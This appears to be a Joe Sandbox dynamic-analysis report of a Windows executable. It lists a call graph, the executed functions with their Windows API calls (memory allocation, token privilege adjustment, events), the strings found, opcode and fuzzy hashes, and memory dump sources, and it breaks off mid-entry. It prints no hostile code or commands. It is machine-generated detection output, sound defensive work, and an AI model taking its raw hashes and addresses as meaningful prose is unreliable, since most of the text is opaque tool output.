7ff6585826fd 16202 7ff658582b23 16201->16202 16222 7ff658592dc0 16201->16222 16204 7ff65858272c _swprintf_c_l 16217 7ff65858296a 16204->16217 16232 7ff658582380 16204->16232 16206 7ff6585828ff 16207 7ff658562ab0 3 API calls 16206->16207 16208 7ff658582939 16207->16208 16208->16217 16236 7ff658582b50 16208->16236 16210 7ff65858295b 16211 7ff65858295f 16210->16211 16213 7ff65858298e 16210->16213 16291 7ff658562a90 VirtualFree 16211->16291 16213->16217 16253 7ff6585959f0 16213->16253 16219 7ff6585629d9 16218->16219 16220 7ff6585629c1 VirtualFree 16218->16220 16219->16199 16220->16199 16221->16201 16223 7ff658592def 16222->16223 16224 7ff658592e12 16223->16224 16225 7ff658592e1c 16223->16225 16230 7ff658592e47 16223->16230 16292 7ff658562b30 16224->16292 16226 7ff658562ab0 3 API calls 16225->16226 16229 7ff658592e2d 16226->16229 16229->16230 16303 7ff658562a90 VirtualFree 16229->16303 16230->16204 16234 7ff65858239f 16232->16234 16235 7ff6585823bb 16234->16235 16304 7ff658562020 16234->16304 16235->16206 16237 7ff658582b85 16236->16237 16238 7ff658582b89 16237->16238 16242 7ff658582ba3 16237->16242 16239 7ff6585b0c20 8 API calls 16238->16239 16240 7ff658582b9b 16239->16240 16240->16210 16241 7ff658582bee EnterCriticalSection 16241->16242 16242->16241 16243 7ff658582c2e LeaveCriticalSection 16242->16243 16244 7ff658582d39 LeaveCriticalSection 16242->16244 16247 7ff658582c7f 16242->16247 16248 7ff658582d18 EnterCriticalSection 16242->16248 16245 7ff6585629e0 3 API calls 16243->16245 16244->16247 16251 7ff658582d4e 16244->16251 16245->16242 16246 7ff6585b0c20 8 API calls 16249 7ff658582d10 16246->16249 16247->16246 16248->16244 16249->16210 16251->16247 16252 7ff658582d73 EnterCriticalSection LeaveCriticalSection 16251->16252 16311 7ff658562a70 VirtualFree 16251->16311 16252->16251 16312 7ff658595930 16253->16312 16256 7ff658581d80 16259 7ff658581de8 16256->16259 16257 7ff658582344 16330 7ff658561ec0 CloseHandle 16257->16330 16258 7ff658582350 16261 7ff658582359 16258->16261 16262 7ff658582365 16258->16262 16289 7ff658581e11 16259->16289 16316 7ff658561f60 16259->16316 16331 7ff658561ec0 CloseHandle 16261->16331 16262->16217 16265 7ff658581e52 16266 7ff658561f60 4 API calls 16265->16266 16265->16289 16267 7ff658581e68 _swprintf_c_l 16266->16267 16268 7ff658562140 10 API calls 16267->16268 16267->16289 16269 7ff658582176 16268->16269 16270 7ff658561f60 4 API calls 16269->16270 16271 7ff6585821ee 16270->16271 16272 7ff658582230 16271->16272 16273 7ff658561f60 4 API calls 16271->16273 16274 7ff6585822fc 16272->16274 16275 7ff6585822f0 16272->16275 16272->16289 16279 7ff658582204 16273->16279 16277 7ff658582305 16274->16277 16278 7ff658582311 16274->16278 16326 7ff658561ec0 CloseHandle 16275->16326 16327 7ff658561ec0 CloseHandle 16277->16327 16281 7ff65858231a 16278->16281 16282 7ff658582326 16278->16282 16279->16272 16321 7ff658561ee0 16279->16321 16328 7ff658561ec0 CloseHandle 16281->16328 16284 7ff65858232f 16282->16284 16282->16289 16329 7ff658561ec0 CloseHandle 16284->16329 16287 7ff65858221a 16287->16272 16288 7ff658561f60 4 API calls 16287->16288 16288->16272 16289->16257 16289->16258 16290 7ff6585822cf 16289->16290 16290->16217 16291->16217 16293 7ff658562bf6 GetLargePageMinimum 16292->16293 16294 7ff658562b5e LookupPrivilegeValueW 16292->16294 16295 7ff658562c16 VirtualAlloc 16293->16295 16296 7ff658562c33 GetCurrentProcess VirtualAllocExNuma 16293->16296 16297 7ff658562b7a GetCurrentProcess OpenProcessToken 16294->16297 16298 7ff658562c2f 16294->16298 16295->16298 16296->16298 16297->16298 16299 7ff658562bb1 AdjustTokenPrivileges GetLastError CloseHandle 16297->16299 16300 7ff6585b0c20 8 API calls 16298->16300 16299->16298 16301 7ff658562beb 16299->16301 16302 7ff658562c66 16300->16302 16301->16293 16301->16298 16302->16229 16303->16230 16305 7ff658562028 16304->16305 16306 7ff658562041 GetLogicalProcessorInformation 16305->16306 16310 7ff65856206d 16305->16310 16307 7ff658562062 GetLastError 16306->16307 16308 7ff658562074 16306->16308 16307->16308 16307->16310 16309 7ff6585620b1 GetLogicalProcessorInformation 16308->16309 16308->16310 16309->16310 16310->16235 16311->16251 16313 7ff658595949 16312->16313 16315 7ff658582b02 16312->16315 16314 7ff658595960 GetEnabledXStateFeatures 16313->16314 16313->16315 16314->16315 16315->16256 16317 7ff6585b0c40 _swprintf_c_l 3 API calls 16316->16317 16318 7ff658561f86 16317->16318 16319 7ff658561f8e CreateEventW 16318->16319 16320 7ff658561fb0 16318->16320 16319->16320 16320->16265 16322 7ff6585b0c40 _swprintf_c_l 3 API calls 16321->16322 16323 7ff658561f06 16322->16323 16324 7ff658561f0e CreateEventW 16323->16324 16325 7ff658561f2e 16323->16325 16324->16325 16325->16287 16326->16274 16327->16278 16328->16282 16329->16289 16330->16258 16331->16262 16332 7ff65856e731 16333 7ff65856e750 16332->16333 16334 7ff65856e832 16333->16334 16336 7ff65856e7b2 16333->16336 16358 7ff658587780 16334->16358 16346 7ff65856e6f2 16336->16346 16349 7ff65856f3d0 16336->16349 16338 7ff65856e8d4 16339 7ff65856ed80 3 API calls 16338->16339 16343 7ff65856e8ec 16339->16343 16340 7ff65856e839 16341 7ff658593070 14 API calls 16340->16341 16348 7ff65856e888 16340->16348 16344 7ff65856e86b 16341->16344 16342 7ff65856e7ff 16343->16346 16344->16346 16347 7ff658587780 GetTickCount64 16344->16347 16344->16348 16345 7ff658593140 WaitForSingleObject 16345->16346 16346->16342 16346->16345 16347->16348 16348->16336 16348->16338 16348->16346 16350 7ff65856f412 16349->16350 16351 7ff65856f4e5 16350->16351 16352 7ff65856f4a6 16350->16352 16353 7ff65856f4f7 16350->16353 16351->16346 16355 7ff65856f4b5 SwitchToThread 16352->16355 16353->16351 16354 7ff6585683d0 WaitForSingleObject 16353->16354 16356 7ff65856f4c3 16354->16356 16355->16356 16356->16351 16357 7ff65857c120 3 API calls 16356->16357 16357->16351 16359 7ff6585877c2 16358->16359 16360 7ff65858779e 16358->16360 16359->16360 16361 7ff6585877e6 GetTickCount64 16359->16361 16360->16340 16361->16360 16362 7ff658551cb0 16363 7ff658551ce0 16362->16363 16364 7ff658551d78 16363->16364 16365 7ff65856899b 18 API calls 16363->16365 16366 7ff658568939 3 API calls 16363->16366 16365->16364 16366->16364 16367 7ff658554070 16368 7ff658557580 9 API calls 16367->16368 16369 7ff658554082 16368->16369 16372 7ff6585f5460 16369->16372 16373 7ff658553200 16 API calls 16372->16373 16374 7ff6585f5481 16373->16374 16379 7ff6585e1a00 16374->16379 16376 7ff6585f5486 16382 7ff6585541d0 16376->16382 16387 7ff6585541a0 16376->16387 16391 7ff6585e1b50 16379->16391 16381 7ff6585e1a10 16381->16376 16384 7ff6585541e0 16382->16384 16383 7ff6585541ec WaitForSingleObjectEx 16383->16384 16386 7ff658554224 16383->16386 16384->16383 16385 7ff658554215 16384->16385 16385->16376 16386->16376 16388 7ff6585541b6 16387->16388 16389 7ff658560b8a 16388->16389 16390 7ff658560b91 SetEvent 16388->16390 16389->16376 16390->16376 16392 7ff6585e1b7c 16391->16392 16393 7ff6585e1bc2 CoInitializeEx 16392->16393 16397 7ff6585e1bee 16392->16397 16394 7ff6585e1bd9 16393->16394 16395 7ff6585e1bdd 16394->16395 16398 7ff6585e1bf0 16394->16398 16395->16397 16403 7ff6585e1c70 16395->16403 16397->16381 16398->16397 16399 7ff6585e1c4e 16398->16399 16400 7ff6585547e0 26 API calls 16398->16400 16401 7ff6585547e0 26 API calls 16399->16401 16400->16399 16402 7ff6585e1c6e 16401->16402 16405 7ff6585e1c96 16403->16405 16404 7ff6585e1cd7 16404->16397 16405->16404 16406 7ff6585e1cc9 CoUninitialize 16405->16406 16406->16404

                                                Executed Functions

                                                Function 00007FF658562760 Relevance: 10.6, APIs: 7, Instructions: 120COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF65855CCEA), ref: 00007FF65856276F
                                                • GetNumaHighestNodeNumber.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF65855CCEA), ref: 00007FF6585627AD
                                                • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF65855CCEA), ref: 00007FF6585627D9
                                                • GetProcessGroupAffinity.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF65855CCEA), ref: 00007FF6585627EA
                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF65855CCEA), ref: 00007FF6585627F9
                                                • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF65855CCEA), ref: 00007FF658562890
                                                • GetProcessAffinityMask.KERNEL32 ref: 00007FF6585628A3
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087187763.00007FF658551000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF658550000, based on PE: true
                                                • Associated: 00000000.00000002.2087176627.00007FF658550000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087349436.00007FF658669000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087694793.00007FF6586A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658719000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF65871F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658724000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087770844.00007FF658727000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff658550000_GJRX21GBj3.jbxd
                                                Similarity
                                                • API ID: Process$AffinityCurrent$ErrorGroupHighestInfoLastMaskNodeNumaNumberSystem
                                                • String ID:
                                                • API String ID: 580471860-0
                                                • Opcode ID: 45801e776555b8e194c9aa2d1e16ed710466e2a1524dc6a719c278de692efd2d
                                                • Instruction ID: 72c84357357c220b612446e5e999be05322ba0187539f37882a4675378efe4d5
                                                • Opcode Fuzzy Hash: 45801e776555b8e194c9aa2d1e16ed710466e2a1524dc6a719c278de692efd2d
                                                • Instruction Fuzzy Hash: 61515C71A5874686EB808F36E8041A867A1FF95B80F8C0032D95EE7B64DF3CE544CB18
                                                Function 00007FF658557D00 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 105COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                  • Part of subcall function 00007FF65855CCC0: FlsAlloc.KERNEL32(?,?,?,?,?,?,?,?,00007FF658557D0F,?,?,?,?,?,?,00007FF658551C00), ref: 00007FF65855CCCB
                                                  • Part of subcall function 00007FF65855CCC0: QueryInformationJobObject.KERNEL32 ref: 00007FF65855CD9E
                                                  • Part of subcall function 00007FF65855CA50: GetModuleHandleExW.KERNEL32(?,?,?,?,00007FF658557D38,?,?,?,?,?,?,00007FF658551C00), ref: 00007FF65855CA61
                                                • RtlAddVectoredExceptionHandler.NTDLL ref: 00007FF658557D99
                                                • RaiseFailFastException.KERNEL32(?,?,?,?,?,?,00007FF658551C00), ref: 00007FF658557E83
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087187763.00007FF658551000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF658550000, based on PE: true
                                                • Associated: 00000000.00000002.2087176627.00007FF658550000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087349436.00007FF658669000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087694793.00007FF6586A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658719000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF65871F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658724000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087770844.00007FF658727000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff658550000_GJRX21GBj3.jbxd
                                                Similarity
                                                • API ID: Exception$AllocFailFastHandleHandlerInformationModuleObjectQueryRaiseVectored
                                                • String ID: The required instruction sets are not supported by the current CPU.$StressLogLevel$TotalStressLogSize
                                                • API String ID: 2052584837-2841289747
                                                • Opcode ID: f2b9abe9ea48f1f248b00dabf98db4d072048249cb7df99e1d28330ab400daa0
                                                • Instruction ID: c3def73b2a30bb03d6982df53786d852ccf9ca05926342ce1605961773c22870
                                                • Opcode Fuzzy Hash: f2b9abe9ea48f1f248b00dabf98db4d072048249cb7df99e1d28330ab400daa0
                                                • Instruction Fuzzy Hash: EA416732E0974282EB91AB71A9426B86791AF41784F4C4031ED4DB7E9ADF2CF946C718
                                                Function 00007FF6585B1544 Relevance: 3.2, APIs: 2, Instructions: 199COMMONLIBRARYCODE
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 260 7ff6585b1544-7ff6585b154d 261 7ff6585b155e-7ff6585b1566 malloc 260->261 262 7ff6585b154f-7ff6585b1559 call 7ff6585b4da1 261->262 263 7ff6585b1568-7ff6585b156d 261->263 266 7ff6585b156e-7ff6585b1572 262->266 267 7ff6585b155b 262->267 268 7ff6585b1574-7ff6585b1579 call 7ff6585b19a4 266->268 269 7ff6585b157a-7ff6585b15d9 call 7ff6585b19c4 266->269 267->261 268->269 274 7ff6585b1636 269->274 275 7ff6585b15db-7ff6585b15f8 269->275 278 7ff6585b163d-7ff6585b164d 274->278 276 7ff6585b1622-7ff6585b1634 275->276 277 7ff6585b15fa-7ff6585b15ff 275->277 276->278 277->276 279 7ff6585b1601-7ff6585b1606 277->279 280 7ff6585b164f-7ff6585b166c 278->280 281 7ff6585b16b4-7ff6585b16e3 278->281 279->276 282 7ff6585b1608-7ff6585b1610 279->282 283 7ff6585b166e-7ff6585b1672 280->283 284 7ff6585b1679-7ff6585b167c 280->284 285 7ff6585b1700-7ff6585b1704 281->285 286 7ff6585b16e5-7ff6585b16fa 281->286 282->274 289 7ff6585b1612-7ff6585b1620 282->289 283->284 290 7ff6585b167e-7ff6585b1694 284->290 291 7ff6585b1697-7ff6585b169f 284->291 287 7ff6585b1835-7ff6585b1849 285->287 288 7ff6585b170a-7ff6585b171e 285->288 286->285 292 7ff6585b1724-7ff6585b172c 288->292 293 7ff6585b181a-7ff6585b181f 288->293 289->274 289->276 290->291 291->281 294 7ff6585b16a1-7ff6585b16b1 291->294 292->293 295 7ff6585b1732-7ff6585b1751 292->295 293->287 296 7ff6585b1821-7ff6585b182a 293->296 294->281 297 7ff6585b17b0 295->297 298 7ff6585b1753-7ff6585b1783 295->298 296->287 299 7ff6585b182c 296->299 301 7ff6585b17b7-7ff6585b17bb 297->301 300 7ff6585b1785-7ff6585b178d 298->300 298->301 299->287 300->297 302 7ff6585b178f-7ff6585b17ae 300->302 303 7ff6585b17c9-7ff6585b17ce 301->303 304 7ff6585b17bd-7ff6585b17c2 301->304 302->301 303->293 305 7ff6585b17d0-7ff6585b17d8 303->305 304->303 305->293 306 7ff6585b17da-7ff6585b180d 305->306 306->293 307 7ff6585b180f-7ff6585b1813 306->307 307->293
                                                APIs
                                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF6585B0C49,?,?,?,?,00007FF65855E371,?,?,?,00007FF65855E8F4,00000000,00000020,?), ref: 00007FF6585B155E
                                                • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6585B1574
                                                  • Part of subcall function 00007FF6585B19A4: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF6585B19AD
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087187763.00007FF658551000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF658550000, based on PE: true
                                                • Associated: 00000000.00000002.2087176627.00007FF658550000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087349436.00007FF658669000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087694793.00007FF6586A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658719000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF65871F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658724000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087770844.00007FF658727000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff658550000_GJRX21GBj3.jbxd
                                                Similarity
                                                • API ID: Concurrency::cancel_current_taskmallocstd::bad_alloc::bad_alloc
                                                • String ID:
                                                • API String ID: 205171174-0
                                                • Opcode ID: 27e6cda894de4fa0304efac44748c012d57ffdf58763d5e7702285d7d28e6379
                                                • Instruction ID: 0dc247c763144935f773c1e55f34c5909c322e7b5a39a8c4ef5c46f990661b07
                                                • Opcode Fuzzy Hash: 27e6cda894de4fa0304efac44748c012d57ffdf58763d5e7702285d7d28e6379
                                                • Instruction Fuzzy Hash: 4E81CF72F8CB0289F795DF39E85127836A1AB24365F484639D92EE7FD5CE3C91408708
                                                Function 00007FF658583480 Relevance: 1.6, Strings: 1, Instructions: 397COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 386 7ff658583480-7ff6585834bb 387 7ff6585834bd-7ff6585834e2 call 7ff658562140 386->387 388 7ff658583506-7ff658583514 386->388 392 7ff6585834e7-7ff6585834ff 387->392 390 7ff658583569 388->390 391 7ff658583516-7ff658583519 388->391 394 7ff658583570-7ff658583577 390->394 391->390 393 7ff65858351b-7ff658583522 391->393 392->388 395 7ff658583524-7ff658583535 393->395 396 7ff658583560-7ff658583567 393->396 397 7ff658583579-7ff65858357c 394->397 398 7ff6585835b7-7ff6585835c9 394->398 401 7ff658583537-7ff658583544 395->401 402 7ff658583546-7ff65858355e 395->402 396->394 397->398 403 7ff65858357e-7ff658583580 397->403 399 7ff6585836ba-7ff6585836c2 398->399 400 7ff6585835cf-7ff6585835d1 398->400 404 7ff6585836c8-7ff6585836cb 399->404 405 7ff658583817-7ff658583826 399->405 406 7ff6585835dc-7ff6585835f1 400->406 407 7ff6585835d3-7ff6585835d7 400->407 401->394 402->394 408 7ff6585835a4 403->408 409 7ff658583582-7ff658583589 403->409 404->405 411 7ff6585836d1-7ff658583712 call 7ff65857f0e0 404->411 414 7ff658583839-7ff658583840 405->414 415 7ff658583828-7ff658583833 405->415 406->399 413 7ff6585835f7-7ff65858360c 406->413 412 7ff65858369f-7ff6585836b3 407->412 410 7ff6585835a8-7ff6585835b1 408->410 416 7ff65858358b-7ff65858358d 409->416 417 7ff65858359e-7ff6585835a2 409->417 410->398 432 7ff6585837dc-7ff6585837e5 411->432 433 7ff658583718-7ff658583729 411->433 412->399 419 7ff658583617-7ff65858362f 413->419 420 7ff65858360e-7ff658583612 413->420 421 7ff658583859-7ff65858385c 414->421 422 7ff658583842-7ff658583854 414->422 415->414 416->398 423 7ff65858358f-7ff65858359c 416->423 417->410 425 7ff658583638-7ff65858364c 419->425 426 7ff658583631-7ff658583636 419->426 420->412 428 7ff658583a47 421->428 429 7ff658583862-7ff658583872 421->429 427 7ff658583b0f-7ff658583b17 422->427 423->398 436 7ff658583650-7ff658583665 425->436 426->436 434 7ff658583b1b-7ff658583b29 427->434 435 7ff658583a4f-7ff658583a52 428->435 430 7ff6585838ca-7ff6585838cd 429->430 431 7ff658583874-7ff65858387e 429->431 430->435 438 7ff6585838d3-7ff6585838db 430->438 431->435 437 7ff658583884-7ff65858388b 431->437 439 7ff65858380c-7ff658583811 432->439 440 7ff6585837e7-7ff658583803 432->440 441 7ff65858372b-7ff658583730 433->441 442 7ff658583732-7ff658583746 433->442 443 7ff658583a58-7ff658583a5b 435->443 444 7ff658583afe-7ff658583b01 435->444 445 7ff65858367d-7ff658583699 436->445 446 7ff658583667-7ff65858366e 436->446 437->430 448 7ff65858388d-7ff6585838b0 437->448 438->428 450 7ff6585838e1-7ff6585838e8 438->450 439->405 440->439 451 7ff658583805 440->451 452 7ff65858374a-7ff658583750 441->452 442->452 443->434 453 7ff658583a61-7ff658583a6a 443->453 444->434 449 7ff658583b03-7ff658583b06 444->449 445->399 447 7ff65858369b 445->447 446->445 454 7ff658583670-7ff65858367a 446->454 447->412 455 7ff658583903-7ff65858390e 448->455 456 7ff6585838b2-7ff6585838b5 448->456 449->427 457 7ff658583b08 449->457 458 7ff6585838ea-7ff6585838fe 450->458 459 7ff65858394e-7ff658583955 450->459 451->439 460 7ff658583759-7ff65858376d 452->460 461 7ff658583752-7ff658583757 452->461 453->434 462 7ff658583a70-7ff658583a7a 453->462 454->445 455->430 467 7ff658583910-7ff65858391a 455->467 465 7ff6585838b7-7ff6585838c1 456->465 466 7ff6585838c3 456->466 457->427 458->449 463 7ff65858395b-7ff658583962 459->463 464 7ff658583a33-7ff658583a42 459->464 468 7ff658583771-7ff658583789 460->468 461->468 462->434 469 7ff658583a80-7ff658583a8d 462->469 470 7ff658583968-7ff658583980 463->470 471 7ff6585839f5-7ff6585839ff 463->471 464->449 465->455 465->466 466->430 472 7ff65858391c 467->472 473 7ff65858391f-7ff65858392e 467->473 474 7ff65858378b-7ff658583790 468->474 475 7ff658583792-7ff6585837a3 468->475 476 7ff658583a96-7ff658583aa7 469->476 477 7ff658583a8f-7ff658583a94 469->477 470->428 480 7ff658583986-7ff65858398e 470->480 471->428 481 7ff658583a01-7ff658583a27 471->481 472->473 473->430 482 7ff658583930-7ff658583949 473->482 478 7ff6585837a7-7ff6585837ba call 7ff65857f0e0 474->478 475->478 479 7ff658583aab-7ff658583ab1 476->479 477->479 490 7ff6585837bc-7ff6585837c1 478->490 491 7ff6585837c3-7ff6585837d4 478->491 484 7ff658583aba-7ff658583acb 479->484 485 7ff658583ab3-7ff658583ab8 479->485 480->428 486 7ff658583994-7ff6585839f0 480->486 481->428 487 7ff658583a29 481->487 482->449 489 7ff658583acf-7ff658583ae2 484->489 485->489 486->449 487->464 489->434 492 7ff658583ae4-7ff658583afd 489->492 493 7ff6585837d8 490->493 491->493 493->432
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087187763.00007FF658551000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF658550000, based on PE: true
                                                • Associated: 00000000.00000002.2087176627.00007FF658550000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087349436.00007FF658669000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087694793.00007FF6586A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658719000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF65871F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658724000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087770844.00007FF658727000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff658550000_GJRX21GBj3.jbxd
                                                Similarity
                                                • API ID: CurrentProcess
                                                • String ID: PA*
                                                • API String ID: 2050909247-2703507504
                                                • Opcode ID: f0dfdf7af6af81cb248c0b7d5687ff178028e7272b22a3959eccb5cdaccec322
                                                • Instruction ID: ec70ed04b28e615c60261fd775b9c0e668c0ce7944ff44eb69ac52239859a160
                                                • Opcode Fuzzy Hash: f0dfdf7af6af81cb248c0b7d5687ff178028e7272b22a3959eccb5cdaccec322
                                                • Instruction Fuzzy Hash: 8D02C461E6864686FA95CB39AC5067C77A2BF45790F6C4636C50EF3E60EF3CB441CA08
                                                Function 00007FF658581D80 Relevance: .3, Instructions: 316COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087187763.00007FF658551000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF658550000, based on PE: true
                                                • Associated: 00000000.00000002.2087176627.00007FF658550000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087349436.00007FF658669000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087694793.00007FF6586A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658719000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF65871F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658724000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087770844.00007FF658727000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff658550000_GJRX21GBj3.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 31edfffabc7a86aa6bd26bd54ab78c534c3898e51446dfa74989900a2a1d072c
                                                • Instruction ID: 86ae8466634448a98bcd9c20adfccc91d5b97662ea7b241713606fb4597eaeda
                                                • Opcode Fuzzy Hash: 31edfffabc7a86aa6bd26bd54ab78c534c3898e51446dfa74989900a2a1d072c
                                                • Instruction Fuzzy Hash: 16F1B521D6DB4345F681EB35AD1117CA7627FA5380F5C8336D50EF1EA2EF2CB5918608
                                                Function 00007FF658562320 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 96COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087187763.00007FF658551000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF658550000, based on PE: true
                                                • Associated: 00000000.00000002.2087176627.00007FF658550000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087349436.00007FF658669000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087694793.00007FF6586A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658719000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF65871F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087734542.00007FF658724000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087770844.00007FF658727000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7ff658550000_GJRX21GBj3.jbxd
                                                Similarity
                                                • API ID: GlobalMemoryStatus$Process$CurrentInformationObjectQuery
                                                • String ID: @$@$@
                                                • API String ID: 2645093340-1177533131
                                                • Opcode ID: 24ec87d12b26eb49bf664ef79eb868f4d5178a434dc5e340da1fb202b067f73e
                                                • Instruction ID: e23768a76e45fd07abff0fa66d4e71b8e4bf824bd82f315a7d20a65042ca374a
                                                • Opcode Fuzzy Hash: 24ec87d12b26eb49bf664ef79eb868f4d5178a434dc5e340da1fb202b067f73e
                                                • Instruction Fuzzy Hash: 38414236609AD1C5EBB18F21E4543A9B3A0FB84B60F984235DBAD97ED8DF3CD4448B04
                                                Function 00007FF65855CCC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 90memoryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • FlsAlloc.KERNEL32(?,?,?,?,?,?,?,?,00007FF658557D0F,?,?,?,?,?,?,00007FF658551C00), ref: 00007FF65855CCCB
                                                  • Part of subcall function 00007FF658562760: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF65855CCEA), ref: 00007FF65856276F
                                                  • Part of subcall function 00007FF658562760: GetNumaHighestNodeNumber.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF65855CCEA), ref: 00007FF6585627AD
                                                  • Part of subcall function 00007FF658562760: GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF65855CCEA), ref: 00007FF6585627D9
                                                  • Part of subcall function 00007FF658562760: GetProcessGroupAffinity.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF65855CCEA), ref: 00007FF6585627EA
                                                  • Part of subcall function 00007FF658562760: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF65855CCEA), ref: 00007FF6585627F9
                                                • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,00007FF658557D0F,?,?,?,?,?,?,00007FF658551C00), ref: 00007FF65855CD3D
                                                • GetProcessAffinityMask.KERNEL32 ref: 00007FF65855CD50
                                                • QueryInformationJobObject.KERNEL32 ref: 00007FF65855CD9E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087187763.00007FF658551000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF658550000, based on PE: true
                                                • Associated: 00000000.00000002.2087176627.00007FF658550000.00000002.00000001.01000000.00000003.sdmpDownload File
